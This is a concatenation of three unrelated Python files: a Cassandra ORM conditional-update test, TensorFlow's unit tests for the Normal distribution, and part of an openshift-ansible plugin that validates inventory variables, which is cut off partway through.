t = TestConditionalModel.create(text='something', count=5)
self.assertEqual(TestConditionalModel.objects(id=t.id).count(), 1)
with self.assertRaises(LWTException):
t.iff(count=9999).update(text=None)
self.assertIsNotNone(TestConditionalModel.objects(id=t.id).first().text)
t.iff(count=5).update(text=None)
self.assertIsNone(TestConditionalModel.objects(id=t.id).first().text)
# QuerySet path
t = TestConditionalModel.create(text='something', count=5)
self.assertEqual(TestConditionalModel.objects(id=t.id).count(), 1)
with self.assertRaises(LWTException):
TestConditionalModel.objects(id=t.id).iff(count=9999).update(text=None)
self.assertIsNotNone(TestConditionalModel.objects(id=t.id).first().text)
TestConditionalModel.objects(id=t.id).iff(count=5).update(text=None)
self.assertIsNone(TestConditionalModel.objects(id=t.id).first().text)
def test_column_delete_after_update(self):
# DML path
t = TestConditionalModel.create(text='something', count=5)
t.iff(count=5).update(text=None, count=6)
self.assertIsNone(t.text)
self.assertEqual(t.count, 6)
# QuerySet path
t = TestConditionalModel.create(text='something', count=5)
TestConditionalModel.objects(id=t.id).iff(count=5).update(text=None, count=6)
self.assertIsNone(TestConditionalModel.objects(id=t.id).first().text)
self.assertEqual(TestConditionalModel.objects(id=t.id).first().count, 6)
|
|
# Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for initializers."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import importlib
import math
import numpy as np
from tensorflow.python.framework import constant_op
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import ops
from tensorflow.python.framework import tensor_shape
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import gradients_impl
from tensorflow.python.ops import nn_ops
from tensorflow.python.ops import variables
from tensorflow.python.ops.distributions import kullback_leibler
from tensorflow.python.ops.distributions import normal as normal_lib
from tensorflow.python.platform import test
from tensorflow.python.platform import tf_logging
def try_import(name): # pylint: disable=invalid-name
module = None
try:
module = importlib.import_module(name)
except ImportError as e:
tf_logging.warning("Could not import %s: %s" % (name, str(e)))
return module
stats = try_import("scipy.stats")
class NormalTest(test.TestCase):
def setUp(self):
self._rng = np.random.RandomState(123)
def assertAllFinite(self, tensor):
is_finite = np.isfinite(tensor.eval())
all_true = np.ones_like(is_finite, dtype=np.bool)
self.assertAllEqual(all_true, is_finite)
def _testParamShapes(self, sample_shape, expected):
with self.test_session():
param_shapes = normal_lib.Normal.param_shapes(sample_shape)
mu_shape, sigma_shape = param_shapes["loc"], param_shapes["scale"]
self.assertAllEqual(expected, mu_shape.eval())
self.assertAllEqual(expected, sigma_shape.eval())
mu = array_ops.zeros(mu_shape)
sigma = array_ops.ones(sigma_shape)
self.assertAllEqual(
expected,
array_ops.shape(normal_lib.Normal(mu, sigma).sample()).eval())
def _testParamStaticShapes(self, sample_shape, expected):
param_shapes = normal_lib.Normal.param_static_shapes(sample_shape)
mu_shape, sigma_shape = param_shapes["loc"], param_shapes["scale"]
self.assertEqual(expected, mu_shape)
self.assertEqual(expected, sigma_shape)
def testParamShapes(self):
sample_shape = [10, 3, 4]
self._testParamShapes(sample_shape, sample_shape)
self._testParamShapes(constant_op.constant(sample_shape), sample_shape)
def testParamStaticShapes(self):
sample_shape = [10, 3, 4]
self._testParamStaticShapes(sample_shape, sample_shape)
self._testParamStaticShapes(
tensor_shape.TensorShape(sample_shape), sample_shape)
def testNormalWithSoftplusScale(self):
with self.test_session():
mu = array_ops.zeros((10, 3))
rho = array_ops.ones((10, 3)) * -2.
normal = normal_lib.NormalWithSoftplusScale(loc=mu, scale=rho)
self.assertAllEqual(mu.eval(), normal.loc.eval())
self.assertAllEqual(nn_ops.softplus(rho).eval(), normal.scale.eval())
def testNormalLogPDF(self):
with self.test_session():
batch_size = 6
mu = constant_op.constant([3.0] * batch_size)
sigma = constant_op.constant([math.sqrt(10.0)] * batch_size)
x = np.array([-2.5, 2.5, 4.0, 0.0, -1.0, 2.0], dtype=np.float32)
normal = normal_lib.Normal(loc=mu, scale=sigma)
log_pdf = normal.log_prob(x)
self.assertAllEqual(normal.batch_shape_tensor().eval(),
log_pdf.get_shape())
self.assertAllEqual(normal.batch_shape_tensor().eval(),
log_pdf.eval().shape)
self.assertAllEqual(normal.batch_shape, log_pdf.get_shape())
self.assertAllEqual(normal.batch_shape, log_pdf.eval().shape)
pdf = normal.prob(x)
self.assertAllEqual(normal.batch_shape_tensor().eval(), pdf.get_shape())
self.assertAllEqual(normal.batch_shape_tensor().eval(), pdf.eval().shape)
self.assertAllEqual(normal.batch_shape, pdf.get_shape())
self.assertAllEqual(normal.batch_shape, pdf.eval().shape)
if not stats:
return
expected_log_pdf = stats.norm(mu.eval(), sigma.eval()).logpdf(x)
self.assertAllClose(expected_log_pdf, log_pdf.eval())
self.assertAllClose(np.exp(expected_log_pdf), pdf.eval())
def testNormalLogPDFMultidimensional(self):
with self.test_session():
batch_size = 6
mu = constant_op.constant([[3.0, -3.0]] * batch_size)
sigma = constant_op.constant([[math.sqrt(10.0), math.sqrt(15.0)]] *
batch_size)
x = np.array([[-2.5, 2.5, 4.0, 0.0, -1.0, 2.0]], dtype=np.float32).T
normal = normal_lib.Normal(loc=mu, scale=sigma)
log_pdf = normal.log_prob(x)
log_pdf_values = log_pdf.eval()
self.assertEqual(log_pdf.get_shape(), (6, 2))
self.assertAllEqual(normal.batch_shape_tensor().eval(),
log_pdf.get_shape())
self.assertAllEqual(normal.batch_shape_tensor().eval(),
log_pdf.eval().shape)
self.assertAllEqual(normal.batch_shape, log_pdf.get_shape())
self.assertAllEqual(normal.batch_shape, log_pdf.eval().shape)
pdf = normal.prob(x)
pdf_values = pdf.eval()
self.assertEqual(pdf.get_shape(), (6, 2))
self.assertAllEqual(normal.batch_shape_tensor().eval(), pdf.get_shape())
self.assertAllEqual(normal.batch_shape_tensor().eval(), pdf_values.shape)
self.assertAllEqual(normal.batch_shape, pdf.get_shape())
self.assertAllEqual(normal.batch_shape, pdf_values.shape)
if not stats:
return
expected_log_pdf = stats.norm(mu.eval(), sigma.eval()).logpdf(x)
self.assertAllClose(expected_log_pdf, log_pdf_values)
self.assertAllClose(np.exp(expected_log_pdf), pdf_values)
def testNormalCDF(self):
with self.test_session():
batch_size = 50
mu = self._rng.randn(batch_size)
sigma = self._rng.rand(batch_size) + 1.0
x = np.linspace(-8.0, 8.0, batch_size).astype(np.float64)
normal = normal_lib.Normal(loc=mu, scale=sigma)
cdf = normal.cdf(x)
self.assertAllEqual(normal.batch_shape_tensor().eval(), cdf.get_shape())
self.assertAllEqual(normal.batch_shape_tensor().eval(), cdf.eval().shape)
self.assertAllEqual(normal.batch_shape, cdf.get_shape())
self.assertAllEqual(normal.batch_shape, cdf.eval().shape)
if not stats:
return
expected_cdf = stats.norm(mu, sigma).cdf(x)
self.assertAllClose(expected_cdf, cdf.eval(), atol=0)
def testNormalSurvivalFunction(self):
with self.test_session():
batch_size = 50
mu = self._rng.randn(batch_size)
sigma = self._rng.rand(batch_size) + 1.0
x = np.linspace(-8.0, 8.0, batch_size).astype(np.float64)
normal = normal_lib.Normal(loc=mu, scale=sigma)
sf = normal.survival_function(x)
self.assertAllEqual(normal.batch_shape_tensor().eval(), sf.get_shape())
self.assertAllEqual(normal.batch_shape_tensor().eval(), sf.eval().shape)
self.assertAllEqual(normal.batch_shape, sf.get_shape())
self.assertAllEqual(normal.batch_shape, sf.eval().shape)
if not stats:
return
expected_sf = stats.norm(mu, sigma).sf(x)
self.assertAllClose(expected_sf, sf.eval(), atol=0)
def testNormalLogCDF(self):
with self.test_session():
batch_size = 50
mu = self._rng.randn(batch_size)
sigma = self._rng.rand(batch_size) + 1.0
x = np.linspace(-100.0, 10.0, batch_size).astype(np.float64)
normal = normal_lib.Normal(loc=mu, scale=sigma)
cdf = normal.log_cdf(x)
self.assertAllEqual(normal.batch_shape_tensor().eval(), cdf.get_shape())
self.assertAllEqual(normal.batch_shape_tensor().eval(), cdf.eval().shape)
self.assertAllEqual(normal.batch_shape, cdf.get_shape())
self.assertAllEqual(normal.batch_shape, cdf.eval().shape)
if not stats:
return
expected_cdf = stats.norm(mu, sigma).logcdf(x)
self.assertAllClose(expected_cdf, cdf.eval(), atol=0, rtol=1e-5)
def testFiniteGradientAtDifficultPoints(self):
for dtype in [np.float32, np.float64]:
g = ops.Graph()
with g.as_default():
mu = variables.Variable(dtype(0.0))
sigma = variables.Variable(dtype(1.0))
dist = normal_lib.Normal(loc=mu, scale=sigma)
x = np.array([-100., -20., -5., 0., 5., 20., 100.]).astype(dtype)
for func in [
dist.cdf, dist.log_cdf, dist.survival_function,
dist.log_survival_function, dist.log_prob, dist.prob
]:
value = func(x)
grads = gradients_impl.gradients(value, [mu, sigma])
with self.test_session(graph=g):
variables.global_variables_initializer().run()
self.assertAllFinite(value)
self.assertAllFinite(grads[0])
self.assertAllFinite(grads[1])
def testNormalLogSurvivalFunction(self):
with self.test_session():
batch_size = 50
mu = self._rng.randn(batch_size)
sigma = self._rng.rand(batch_size) + 1.0
x = np.linspace(-10.0, 100.0, batch_size).astype(np.float64)
normal = normal_lib.Normal(loc=mu, scale=sigma)
sf = normal.log_survival_function(x)
self.assertAllEqual(normal.batch_shape_tensor().eval(), sf.get_shape())
self.assertAllEqual(normal.batch_shape_tensor().eval(), sf.eval().shape)
self.assertAllEqual(normal.batch_shape, sf.get_shape())
self.assertAllEqual(normal.batch_shape, sf.eval().shape)
if not stats:
return
expected_sf = stats.norm(mu, sigma).logsf(x)
self.assertAllClose(expected_sf, sf.eval(), atol=0, rtol=1e-5)
def testNormalEntropyWithScalarInputs(self):
# Scipy.stats.norm cannot deal with the shapes in the other test.
with self.test_session():
mu_v = 2.34
sigma_v = 4.56
normal = normal_lib.Normal(loc=mu_v, scale=sigma_v)
entropy = normal.entropy()
self.assertAllEqual(normal.batch_shape_tensor().eval(),
entropy.get_shape())
self.assertAllEqual(normal.batch_shape_tensor().eval(),
entropy.eval().shape)
self.assertAllEqual(normal.batch_shape, entropy.get_shape())
self.assertAllEqual(normal.batch_shape, entropy.eval().shape)
# scipy.stats.norm cannot deal with these shapes.
if not stats:
return
expected_entropy = stats.norm(mu_v, sigma_v).entropy()
self.assertAllClose(expected_entropy, entropy.eval())
def testNormalEntropy(self):
with self.test_session():
mu_v = np.array([1.0, 1.0, 1.0])
sigma_v = np.array([[1.0, 2.0, 3.0]]).T
normal = normal_lib.Normal(loc=mu_v, scale=sigma_v)
# scipy.stats.norm cannot deal with these shapes.
sigma_broadcast = mu_v * sigma_v
expected_entropy = 0.5 * np.log(2 * np.pi * np.exp(1) * sigma_broadcast**
2)
entropy = normal.entropy()
np.testing.assert_allclose(expected_entropy, entropy.eval())
self.assertAllEqual(normal.batch_shape_tensor().eval(),
entropy.get_shape())
self.assertAllEqual(normal.batch_shape_tensor().eval(),
entropy.eval().shape)
self.assertAllEqual(normal.batch_shape, entropy.get_shape())
self.assertAllEqual(normal.batch_shape, entropy.eval().shape)
def testNormalMeanAndMode(self):
with self.test_session():
# Mu will be broadcast to [7, 7, 7].
mu = [7.]
sigma = [11., 12., 13.]
normal = normal_lib.Normal(loc=mu, scale=sigma)
self.assertAllEqual((3,), normal.mean().get_shape())
self.assertAllEqual([7., 7, 7], normal.mean().eval())
self.assertAllEqual((3,), normal.mode().get_shape())
self.assertAllEqual([7., 7, 7], normal.mode().eval())
def testNormalQuantile(self):
with self.test_session():
batch_size = 52
mu = self._rng.randn(batch_size)
sigma = self._rng.rand(batch_size) + 1.0
p = np.linspace(0., 1.0, batch_size - 2).astype(np.float64)
# Quantile performs piecewise rational approximation so adding some
# special input values to make sure we hit all the pieces.
p = np.hstack((p, np.exp(-33), 1. - np.exp(-33)))
normal = normal_lib.Normal(loc=mu, scale=sigma)
x = normal.quantile(p)
self.assertAllEqual(normal.batch_shape_tensor().eval(), x.get_shape())
self.assertAllEqual(normal.batch_shape_tensor().eval(), x.eval().shape)
self.assertAllEqual(normal.batch_shape, x.get_shape())
self.assertAllEqual(normal.batch_shape, x.eval().shape)
if not stats:
return
expected_x = stats.norm(mu, sigma).ppf(p)
self.assertAllClose(expected_x, x.eval(), atol=0.)
def _baseQuantileFiniteGradientAtDifficultPoints(self, dtype):
g = ops.Graph()
with g.as_default():
mu = variables.Variable(dtype(0.0))
sigma = variables.Variable(dtype(1.0))
dist = normal_lib.Normal(loc=mu, scale=sigma)
p = variables.Variable(
np.array([0.,
np.exp(-32.), np.exp(-2.),
1. - np.exp(-2.), 1. - np.exp(-32.),
1.]).astype(dtype))
value = dist.quantile(p)
grads = gradients_impl.gradients(value, [mu, p])
with self.test_session(graph=g):
variables.global_variables_initializer().run()
self.assertAllFinite(grads[0])
self.assertAllFinite(grads[1])
def testQuantileFiniteGradientAtDifficultPointsFloat32(self):
self._baseQuantileFiniteGradientAtDifficultPoints(np.float32)
def testQuantileFiniteGradientAtDifficultPointsFloat64(self):
self._baseQuantileFiniteGradientAtDifficultPoints(np.float64)
def testNormalVariance(self):
with self.test_session():
# sigma will be broadcast to [7, 7, 7]
mu = [1., 2., 3.]
sigma = [7.]
normal = normal_lib.Normal(loc=mu, scale=sigma)
self.assertAllEqual((3,), normal.variance().get_shape())
self.assertAllEqual([49., 49, 49], normal.variance().eval())
def testNormalStandardDeviation(self):
with self.test_session():
# sigma will be broadcast to [7, 7, 7]
mu = [1., 2., 3.]
sigma = [7.]
normal = normal_lib.Normal(loc=mu, scale=sigma)
self.assertAllEqual((3,), normal.stddev().get_shape())
self.assertAllEqual([7., 7, 7], normal.stddev().eval())
def testNormalSample(self):
with self.test_session():
mu = constant_op.constant(3.0)
sigma = constant_op.constant(math.sqrt(3.0))
mu_v = 3.0
sigma_v = np.sqrt(3.0)
n = constant_op.constant(100000)
normal = normal_lib.Normal(loc=mu, scale=sigma)
samples = normal.sample(n)
sample_values = samples.eval()
# Note that the standard error for the sample mean is ~ sigma / sqrt(n).
# The sample variance similarly is dependent on sigma and n.
# Thus, the tolerances below are very sensitive to number of samples
# as well as the variances chosen.
self.assertEqual(sample_values.shape, (100000,))
self.assertAllClose(sample_values.mean(), mu_v, atol=1e-1)
self.assertAllClose(sample_values.std(), sigma_v, atol=1e-1)
expected_samples_shape = tensor_shape.TensorShape([n.eval()]).concatenate(
tensor_shape.TensorShape(normal.batch_shape_tensor().eval()))
self.assertAllEqual(expected_samples_shape, samples.get_shape())
self.assertAllEqual(expected_samples_shape, sample_values.shape)
expected_samples_shape = (tensor_shape.TensorShape(
[n.eval()]).concatenate(normal.batch_shape))
self.assertAllEqual(expected_samples_shape, samples.get_shape())
self.assertAllEqual(expected_samples_shape, sample_values.shape)
def testNormalSampleMultiDimensional(self):
with self.test_session():
batch_size = 2
mu = constant_op.constant([[3.0, -3.0]] * batch_size)
sigma = constant_op.constant([[math.sqrt(2.0), math.sqrt(3.0)]] *
batch_size)
mu_v = [3.0, -3.0]
sigma_v = [np.sqrt(2.0), np.sqrt(3.0)]
n = constant_op.constant(100000)
normal = normal_lib.Normal(loc=mu, scale=sigma)
samples = normal.sample(n)
sample_values = samples.eval()
# Note that the standard error for the sample mean is ~ sigma / sqrt(n).
# The sample variance similarly is dependent on sigma and n.
# Thus, the tolerances below are very sensitive to number of samples
# as well as the variances chosen.
self.assertEqual(samples.get_shape(), (100000, batch_size, 2))
self.assertAllClose(sample_values[:, 0, 0].mean(), mu_v[0], atol=1e-1)
self.assertAllClose(sample_values[:, 0, 0].std(), sigma_v[0], atol=1e-1)
self.assertAllClose(sample_values[:, 0, 1].mean(), mu_v[1], atol=1e-1)
self.assertAllClose(sample_values[:, 0, 1].std(), sigma_v[1], atol=1e-1)
expected_samples_shape = tensor_shape.TensorShape([n.eval()]).concatenate(
tensor_shape.TensorShape(normal.batch_shape_tensor().eval()))
self.assertAllEqual(expected_samples_shape, samples.get_shape())
self.assertAllEqual(expected_samples_shape, sample_values.shape)
expected_samples_shape = (tensor_shape.TensorShape(
[n.eval()]).concatenate(normal.batch_shape))
self.assertAllEqual(expected_samples_shape, samples.get_shape())
self.assertAllEqual(expected_samples_shape, sample_values.shape)
def testNegativeSigmaFails(self):
with self.test_session():
normal = normal_lib.Normal(
loc=[1.], scale=[-5.], validate_args=True, name="G")
with self.assertRaisesOpError("Condition x > 0 did not hold"):
normal.mean().eval()
def testNormalShape(self):
with self.test_session():
mu = constant_op.constant([-3.0] * 5)
sigma = constant_op.constant(11.0)
normal = normal_lib.Normal(loc=mu, scale=sigma)
self.assertEqual(normal.batch_shape_tensor().eval(), [5])
self.assertEqual(normal.batch_shape, tensor_shape.TensorShape([5]))
self.assertAllEqual(normal.event_shape_tensor().eval(), [])
self.assertEqual(normal.event_shape, tensor_shape.TensorShape([]))
def testNormalShapeWithPlaceholders(self):
mu = array_ops.placeholder(dtype=dtypes.float32)
sigma = array_ops.placeholder(dtype=dtypes.float32)
normal = normal_lib.Normal(loc=mu, scale=sigma)
with self.test_session() as sess:
# get_batch_shape should return an "<unknown>" tensor.
self.assertEqual(normal.batch_shape, tensor_shape.TensorShape(None))
self.assertEqual(normal.event_shape, ())
self.assertAllEqual(normal.event_shape_tensor().eval(), [])
self.assertAllEqual(
sess.run(normal.batch_shape_tensor(),
feed_dict={mu: 5.0,
sigma: [1.0, 2.0]}), [2])
def testNormalNormalKL(self):
with self.test_session() as sess:
batch_size = 6
mu_a = np.array([3.0] * batch_size)
sigma_a = np.array([1.0, 2.0, 3.0, 1.5, 2.5, 3.5])
mu_b = np.array([-3.0] * batch_size)
sigma_b = np.array([0.5, 1.0, 1.5, 2.0, 2.5, 3.0])
n_a = normal_lib.Normal(loc=mu_a, scale=sigma_a)
n_b = normal_lib.Normal(loc=mu_b, scale=sigma_b)
kl = kullback_leibler.kl_divergence(n_a, n_b)
kl_val = sess.run(kl)
kl_expected = ((mu_a - mu_b)**2 / (2 * sigma_b**2) + 0.5 * (
(sigma_a**2 / sigma_b**2) - 1 - 2 * np.log(sigma_a / sigma_b)))
self.assertEqual(kl.get_shape(), (batch_size,))
self.assertAllClose(kl_val, kl_expected)
if __name__ == "__main__":
test.main()
|
|
"""
Ansible action plugin to ensure inventory variables are set
appropriately and no conflicting options have been provided.
"""
import json
import re
from ansible.plugins.action import ActionBase
from ansible import errors
# pylint: disable=import-error,no-name-in-module
from ansible.module_utils.six.moves.urllib.parse import urlparse
# Valid values for openshift_deployment_type
VALID_DEPLOYMENT_TYPES = ('origin', 'openshift-enterprise')
# Tuple of variable names and default values if undefined.
NET_PLUGIN_LIST = (('openshift_use_openshift_sdn', True),
('openshift_use_flannel', False),
('openshift_use_nuage', False),
('openshift_use_contiv', False),
('openshift_use_calico', False),
('openshift_use_kuryr', False))
ENTERPRISE_TAG_REGEX_ERROR = """openshift_image_tag must be in the format
v#.#[.#[.#]]. Examples: v1.2, v3.4.1, v3.5.1.3,
v3.5.1.3.4, v1.2-1, v1.2.3-4, v1.2.3-4.5, v1.2.3-4.5.6
You specified openshift_image_tag={}"""
ORIGIN_TAG_REGEX_ERROR = """openshift_image_tag must be in the format
v#.#[.#-optional.#]. Examples: v1.2.3, v3.5.1-alpha.1
You specified openshift_image_tag={}"""
ORIGIN_TAG_REGEX = {'re': '(^v?\\d+\\.\\d+.*)',
'error_msg': ORIGIN_TAG_REGEX_ERROR}
ENTERPRISE_TAG_REGEX = {'re': '(^v\\d+\\.\\d+(\\.\\d+)*(-\\d+(\\.\\d+)*)?$)',
'error_msg': ENTERPRISE_TAG_REGEX_ERROR}
IMAGE_TAG_REGEX = {'origin': ORIGIN_TAG_REGEX,
'openshift-enterprise': ENTERPRISE_TAG_REGEX}
PKG_VERSION_REGEX_ERROR = """openshift_pkg_version must be in the format
-[optional.release]. Examples: -3.6.0, -3.7.0-0.126.0.git.0.9351aae.el7 -3.11*
You specified openshift_pkg_version={}"""
PKG_VERSION_REGEX = {'re': '(^-.*)',
'error_msg': PKG_VERSION_REGEX_ERROR}
RELEASE_REGEX_ERROR = """openshift_release must be in the format
v#[.#[.#]]. Examples: v3.9, v3.10.0
You specified openshift_release={}"""
RELEASE_REGEX = {'re': '(^v?\\d+(\\.\\d+(\\.\\d+)?)?$)',
'error_msg': RELEASE_REGEX_ERROR}
STORAGE_KIND_TUPLE = (
'openshift_hosted_registry_storage_kind',
'openshift_loggingops_storage_kind',
'openshift_logging_storage_kind',
'openshift_metrics_storage_kind',
'openshift_prometheus_alertbuffer_storage_kind',
'openshift_prometheus_alertmanager_storage_kind',
'openshift_prometheus_storage_kind')
IMAGE_POLICY_CONFIG_VAR = "openshift_master_image_policy_config"
ALLOWED_REGISTRIES_VAR = "openshift_master_image_policy_allowed_registries_for_import"
REMOVED_VARIABLES = (
# TODO(michaelgugino): Remove in 3.12
('oreg_auth_credentials_replace', 'Removed: Credentials are now always updated'),
('oreg_url_master', 'oreg_url'),
('oreg_url_node', 'oreg_url'),
)
# JSON_FORMAT_VARIABLES does not intende to cover all json variables, but
# complicated json variables in hosts.example are covered.
JSON_FORMAT_VARIABLES = (
'openshift_builddefaults_json',
'openshift_buildoverrides_json',
'openshift_master_admission_plugin_config',
'openshift_master_audit_config',
'openshift_crio_docker_gc_node_selector',
'openshift_master_image_policy_allowed_registries_for_import',
'openshift_master_image_policy_config',
'openshift_master_oauth_templates',
'container_runtime_extra_storage',
'openshift_additional_repos',
'openshift_master_identity_providers',
'openshift_master_htpasswd_users',
'openshift_additional_projects',
'openshift_hosted_routers',
'openshift_node_open_ports',
'openshift_master_open_ports',
)
def to_bool(var_to_check):
"""Determine a boolean value given the multiple
ways bools can be specified in ansible."""
# http://yaml.org/type/bool.html
yes_list = (True, 1, "True", "1", "true", "TRUE",
"Yes", "yes", "Y", "y", "YES",
"on", "ON", "On")
return var_to_check in yes_list
def check_for_removed_vars(hostvars, host):
"""Fails if removed variables are found"""
found_removed = []
for item in REMOVED_VARIABLES:
if item in hostvars[host]:
found_removed.append(item)
if found_removed:
msg = "Found removed variables: "
for item in found_removed:
msg += "{} is replaced by {}; ".format(item[0], item[1])
raise errors.AnsibleModuleError(msg)
return None
class ActionModule(ActionBase):
"""Action plugin to execute sanity checks."""
def template_var(self, hostvars, host, varname):
"""Retrieve a variable from hostvars and template it.
If undefined, return None type."""
# We will set the current host and variable checked for easy debugging
# if there are any unhandled exceptions.
# pylint: disable=W0201
self.last_checked_var = varname
# pylint: disable=W0201
self.last_checked_host = host
res = hostvars[host].get(varname)
if res is None:
return None
return self._templar.template(res)
def check_openshift_deployment_type(self, hostvars, host):
"""Ensure a valid openshift_deployment_type is set"""
openshift_deployment_type = self.template_var(hostvars, host,
'openshift_deployment_type')
if openshift_deployment_type not in VALID_DEPLOYMENT_TYPES:
type_strings = ", ".join(VALID_DEPLOYMENT_TYPES)
msg = "openshift_deployment_type must be defined and one of {}".format(type_strings)
raise errors.AnsibleModuleError(msg)
return openshift_deployment_type
def get_allowed_registries(self, hostvars, host):
"""Returns a list of configured allowedRegistriesForImport as a list of patterns"""
allowed_registries_for_import = self.template_var(hostvars, host, ALLOWED_REGISTRIES_VAR)
if allowed_registries_for_import is None:
image_policy_config = self.template_var(hostvars, host, IMAGE_POLICY_CONFIG_VAR)
if not image_policy_config:
return image_policy_config
if isinstance(image_policy_config, str):
try:
image_policy_config = json.loads(image_policy_config)
except Exception:
raise errors.AnsibleModuleError(
"{} is not a valid json string".format(IMAGE_POLICY_CONFIG_VAR))
if not isinstance(image_policy_config, dict):
raise errors.AnsibleModuleError(
"expected dictionary for {}, not {}".format(
IMAGE_POLICY_CONFIG_VAR, type(image_policy_config)))
detailed = image_policy_config.get("allowedRegistriesForImport", None)
if not detailed:
return detailed
if not isinstance(detailed, list):
raise errors.AnsibleModuleError("expected list for {}['{}'], not {}".format(
IMAGE_POLICY_CONFIG_VAR, "allowedRegistriesForImport",
type(allowed_registries_for_import)))
try:
return [i["domainName"] for i in detailed]
except Exception:
raise errors.AnsibleModuleError(
"each item of allowedRegistriesForImport must be a dictionary with 'domainName' key")
if not isinstance(allowed_registries_for_import, list):
raise errors.AnsibleModuleError("expected list for {}, not {}".format(
IMAGE_POLICY_CONFIG_VAR, type(allowed_registries_for_import)))
return allowed_registries_for_import
def check_whitelisted_registries(self, hostvars, host):
"""Ensure defined registries are whitelisted"""
allowed = self.get_allowed_registries(hostvars, host)
if allowed is None:
return
unmatched_registries = []
for regvar in (
"oreg_url"
"openshift_cockpit_deployer_prefix",
"openshift_metrics_image_prefix",
"openshift_logging_image_prefix",
"openshift_service_catalog_image_prefix",
"openshift_docker_insecure_registries"):
value = self.template_var(hostvars, host, regvar)
if not value:
continue
if isinstance(value, list):
registries = value
else:
registries = [value]
for reg in registries:
if not any(is_registry_match(reg, pat) for pat in allowed):
unmatched_registries.append((regvar, reg))
if unmatched_registries:
registry_list = ", ".join(["{}:{}".format(n, v) for n, v in unmatched_registries])
raise errors.AnsibleModuleError(
"registry hostnames of the following image prefixes are not whitelisted by image"
" policy configuration: {}".format(registry_list))
def check_python_version(self, hostvars, host, distro):
"""Ensure python version is 3 for Fedora and python 2 for others"""
ansible_python = self.template_var(hostvars, host, 'ansible_python')
if distro == "Fedora":
if ansible_python['version']['major'] != 3:
msg = "openshift-ansible requires Python 3 for {};".format(distro)
msg += " For information on enabling Python 3 with Ansible,"
msg += " see https://docs.ansible.com/ansible/python_3_support.html"
raise errors.AnsibleModuleError(msg)
else:
if ansible_python['version']['major'] != 2:
msg = "openshift-ansible requires Python 2 for {};".format(distro)
def check_image_tag_format(self, hostvars, host, openshift_deployment_type):
"""Ensure openshift_image_tag is formatted correctly"""
openshift_image_tag = self.template_var(hostvars, host, 'openshift_image_tag')
if not openshift_image_tag or openshift_image_tag == 'latest':
return None
regex_to_match = IMAGE_TAG_REGEX[openshift_deployment_type]['re']
res = re.match(regex_to_match, str(openshift_image_tag))
if res is None:
msg = IMAGE_TAG_REGEX[openshift_deployment_type]['error_msg']
msg = msg.format(str(openshift_image_tag))
raise errors.AnsibleModuleError(msg)
def check_pkg_version_format(self, hostvars, host):
"""Ensure openshift_pkg_version is formatted correctly"""
openshift_pkg_version = self.template_var(hostvars, host, 'openshift_pkg_version')
if not openshift_pkg_version:
return None
regex_to_match = PKG_VERSION_REGEX['re']
res = re.match(regex_to_match, str(openshift_pkg_version))
if res is None:
msg = PKG_VERSION_REGEX['error_msg']
msg = msg.format(str(openshift_pkg_version))
raise errors.AnsibleModuleError(msg)
def check_release_format(self, hostvars, host):
"""Ensure openshift_release is formatted correctly"""
openshift_release = self.template_var(hostvars, host, 'openshift_release')
if not openshift_release:
return None
regex_to_match = RELEASE_REGEX['re']
res = re.match(regex_to_match, str(openshift_release))
if res is None:
msg = RELEASE_REGEX['error_msg']
msg = msg.format(str(openshift_release))
raise errors.AnsibleModuleError(msg)
def network_plugin_check(self, hostvars, host):
"""Ensure only one type of network plugin is enabled"""
res = []
# Loop through each possible network plugin boolean, determine the
# actual boolean value, and append results into a list.
for plugin, default_val in NET_PLUGIN_LIST:
res_temp = self.template_var(hostvars, host, plugin)
if res_temp is None:
res_temp = default_val
res.append(to_bool(res_temp))
if sum(res) not in (0, 1):
plugin_str = list(zip([x[0] for x in NET_PLUGIN_LIST], res))
msg = "Host Checked: {} Only one of must be true. Found: {}".format(host, plugin_str)
raise errors.AnsibleModuleError(msg)
def check_hostname_vars(self, hostvars, host):
"""Checks to ensure openshift_hostname
and openshift_public_hostname
conform to the proper length of 63 characters or less"""
for varname in ('openshift_public_hostname', 'openshift_hostname'):
var_value = self.template_var(hostvars, host, varname)
if var_value and len(var_value) > 63:
msg = '{} must be 63 characters or less'.format(varname)
raise errors.AnsibleModuleError(msg)
def check_session_auth_secrets(self, hostvars, host):
"""Checks session_auth_secrets is correctly formatted"""
sas = self.template_var(hostvars, host,
'openshift_master_session_auth_secrets')
ses = self.template_var(hostvars, host,
'openshift_master_session_encryption_secrets')
# This variable isn't mandatory, only check if set.
if sas is None and ses is None:
return None
if not (
issubclass(type(sas), list) and issubclass(type(ses), list)
) or len(sas) != len(ses):
raise errors.AnsibleModuleError(
'Expects openshift_master_session_auth_secrets and '
'openshift_master_session_encryption_secrets are equal length lists')
for secret in sas:
if len(secret) < 32:
raise errors.AnsibleModuleError(
'Invalid secret in openshift_master_session_auth_secrets. '
'Secrets must be at least 32 characters in length.')
for secret in ses:
if len(secret) not in [16, 24, 32]:
raise errors.AnsibleModuleError(
'Invalid secret in openshift_master_session_encryption_secrets. '
'Secrets must be 16, 24, or 32 characters in length.')
return None
def check_unsupported_nfs_configs(self, hostvars, host):
"""Fails if nfs storage is in use for any components. This check is
ignored if openshift_enable_unsupported_configurations=True"""
enable_unsupported = self.template_var(
hostvars, host, 'openshift_enable_unsupported_configurations')
if to_bool(enable_unsupported):
return None
for storage in STORAGE_KIND_TUPLE:
kind = self.template_var(hostvars, host, storage)
if kind == 'nfs':
raise errors.AnsibleModuleError(
'nfs is an unsupported type for {}. '
'openshift_enable_unsupported_configurations=True must'
'be specified to continue with this configuration.'
''.format(storage))
return None
def check_htpasswd_provider(self, hostvars, host):
"""Fails if openshift_master_identity_providers contains an entry of
kind HTPasswdPasswordIdentityProvider and
openshift_master_manage_htpasswd is False"""
manage_pass = self.template_var(
hostvars, host, 'openshift_master_manage_htpasswd')
if to_bool(manage_pass):
# If we manage the file, we can just generate in the new path.
return None
idps = self.template_var(
hostvars, host, 'openshift_master_identity_providers')
if not idps:
# If we don't find any identity_providers, nothing for us to do.
return None
